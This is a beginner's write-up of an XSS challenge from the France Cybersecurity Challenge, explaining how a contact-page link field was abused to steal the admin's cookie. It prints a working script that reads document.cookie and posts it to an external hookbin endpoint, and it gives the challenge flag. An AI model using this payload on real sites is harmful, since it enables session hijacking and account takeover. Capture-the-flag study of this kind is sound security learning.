This challenge was an introduction one, made for beginners like me.
Looking at the webapp
The web application is located at http://challenges2.france-cybersecurity-challenge.fr:5001/

If we use the search bar :

Looking at the url gives us : http://challenges2.france-cybersecurity-challenge.fr:5001/index.php?search=I+love+cybersecurity+%21
As the tags of the challenge mentioned XSS, I knew where to look at.

In the contact page , we have an URL input field for found bugs. It looks like a stored XSS…

Exploiting the contact page
If we have a contact page, it is likely for the admin to click on links we give him. Our goal is to steal his cookie. The solution I used (I don’t know if there are any different), was to make him send a request to a bin.
Here’s how it works :
We send a link to the admin with a JS HTTP request in URL. Then we wait for him to click on our link and we can steal his cookie.
For this challenge, I used HookBin which is free and damn simple to use.
Here is the script to steak the cookie :
<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://hookb.in/<your_hookbin_id_here>", true);
xhr.setRequestHeader("Content-Type", "application/json");
xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest");
xhr.onreadystatechange = function () {
if (xhr.readyState === 4 && xhr.status === 200) {
console.log("done.");
}
};
var data = JSON.stringify({
"COOKIE": document.cookie
});
xhr.send(data);
</script>
But putting this script as-is in the url won’t work. We have to encode this to URL format. As a MacBook user, I tend to use Boop to do this kind of stuff.

Then by doing ⌘ + B and typing URL Encode, here’s the result :

Receiving the request
This picture show what’s the result is when the admin clicks on our link :

So we’ve stolen the admin cookie and gained 20 points… Which is pretty nice for an absolute n00b like me 😉
Flag : FCSC{4e0451cc88a9a96e7e46947461382008d8c8f4304373b8907964675c27d7c633}